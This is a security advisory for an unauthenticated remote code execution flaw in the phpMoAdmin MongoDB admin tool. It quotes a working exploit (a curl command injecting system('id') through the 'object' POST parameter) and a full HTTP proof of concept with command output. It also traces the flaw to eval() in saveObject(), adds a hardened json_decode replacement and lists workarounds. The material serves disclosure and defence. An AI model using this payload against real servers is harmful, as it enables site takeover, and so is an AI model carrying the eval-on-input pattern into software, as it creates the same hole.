PHPMoAdmin Unauthorized Remote Code Execution Vulnerability
Posted: 2015-03-17 09:41:57
Published: 2015-03-04
Updated: 2015-03-05
Affected systems:
PHPMoAdmin
Details:
MongoDB is an open-source NoSQL database. phpMoAdmin is a free, open-source, PHP-based, AJAX-driven GUI administration tool for MongoDB that lets administrators manage a NoSQL database with ease.
phpMoAdmin's implementation contains a remote code execution vulnerability: an unauthenticated remote user can exploit it to take over any website that deploys the phpMoAdmin tool.
Source:
sp1nlock
References:
http://www.exploit-db.com/exploits/36251/
Test method:
Warning: the following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!
######################################################################
#  _     ___  _   _  ____  ____    _  _____
# | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
# | |  | | | |  \| | |  _| |     / _ \ | |
# | |__| |_| | |\  | |_| | |___ / ___ \| |
# |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################
[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a
stripped-down version of the Vork high-performance framework.
[+] Exploit
============================================================
Someone was trying to sell this shit for 3000usd lolz
$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"
[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7
POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
object=1;system('id;ls -lha');exit
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 16:57:40 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 223
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 116K
drwxr-xr-x 1 longcat longcat 102 Mar 3 16:55 .
drwxr-xr-x 6 root root 4.0K Mar 3 16:17 ..
-rw-rw-r-- 1 longcat longcat 112K Mar 3 16:55 moadmin.php
[+] Vulnerability Analysis
============================================================
Filename: moadmin.php
1. create new moadminComponent object
1977: $mo = new moadminComponent;
2. if the http-post parameter 'object' is set
738: class moadminComponent {
...
762: public function __construct() {
...
786: if (isset($_POST['object'])) {
787: if (self::$model->saveObject($_GET['collection'], $_POST['object'])) {
...
3. evaluate the value of 'object' as PHP code
692: public function saveObject($collection, $obj) {
693: eval('$obj=' . $obj . ';'); //cast from string to array
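The root cause in the analysis above is that saveObject() turns the untrusted 'object' parameter into an array by passing it through eval(), so any PHP statement in that parameter runs on the server. The following is an added example (not phpMoAdmin's own code) of the hardened replacement a maintainer would write: the document is transported as JSON and decoded with json_decode(), so it is data, never code. It assumes the admin UI is changed to submit JSON instead of PHP array-literal syntax, and it stands in a hypothetical FakeCollection for the real collection object so the file runs on its own.

```php
<?php
// Added example, not phpMoAdmin code: hardened replacement for the
// eval()-based "cast from string to array" in saveObject().
// Assumptions: the 'object' POST parameter carries one MongoDB document
// encoded as JSON, and FakeCollection (hypothetical) stands in for the
// real collection object that exposes a save() method.

declare(strict_types=1);

/**
 * Parse the user-supplied document string without evaluating it as PHP.
 * Returns the decoded document on success, or null when the input is not
 * a JSON object (malformed text, a bare scalar, or a JSON array).
 */
function parseObjectInput(string $raw): ?array
{
    // Decode as an associative array; depth 64 bounds nesting of hostile input.
    $decoded = json_decode($raw, true, 64);
    if (json_last_error() !== JSON_ERROR_NONE) {
        return null; // malformed, or not JSON at all (e.g. PHP statements)
    }
    if (!is_array($decoded)) {
        return null; // scalars such as 1 or "x" are not documents
    }
    // json_decode succeeded and gave an array, so $raw is non-empty and
    // begins with '{' or '['; only an object is a valid document.
    if (ltrim($raw)[0] !== '{') {
        return null; // top-level JSON array, not a document
    }
    return $decoded;
}

/** Hypothetical stand-in for the collection object so the example is self-contained. */
final class FakeCollection
{
    /** @var array<int, array> documents "saved" during the demo */
    public $saved = [];

    public function save(array $doc): bool
    {
        $this->saved[] = $doc;
        return true;
    }
}

/** Hardened saveObject(): refuses anything parseObjectInput() does not accept. */
function saveObjectHardened(FakeCollection $collection, string $obj): bool
{
    $doc = parseObjectInput($obj);
    if ($doc === null) {
        // Log and refuse; nothing from $obj is ever executed.
        error_log('saveObject: rejected input that is not a JSON document');
        return false;
    }
    return $collection->save($doc);
}

// Demo: a legitimate JSON document is accepted; the injected-statement
// string from the advisory is refused instead of being executed.
$col = new FakeCollection();
var_dump(saveObjectHardened($col, '{"name":"alice","role":"user"}'));
var_dump(saveObjectHardened($col, "1;system('id');exit"));
var_dump(count($col->saved));
```

The design point is that the parser only ever produces data: json_decode() has no code path that calls a PHP function named in the input, so the class of bug disappears rather than being filtered. Rejecting bare scalars and top-level arrays additionally stops malformed documents from reaching the collection.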
Solutions:
Temporary workaround:
We recommend the following measures to reduce the threat:
* Until the developer releases a fix, MongoDB users should stop using the phpMoAdmin tool for the time being.
* Or temporarily switch to another free MongoDB GUI tool, for example:
RockMongo
MongoVUE
Mongo-Express
UMongo
Genghis
* Or restrict unauthorized access to the moadmin.php file with per-directory password protection (an .htaccess password).
Vendor patch:
PHPMoAdmin
----------
The vendor has not yet released a patch or upgrade. Users of this software should watch the vendor's homepage for the latest version:
http://www.phpmoadmin.com/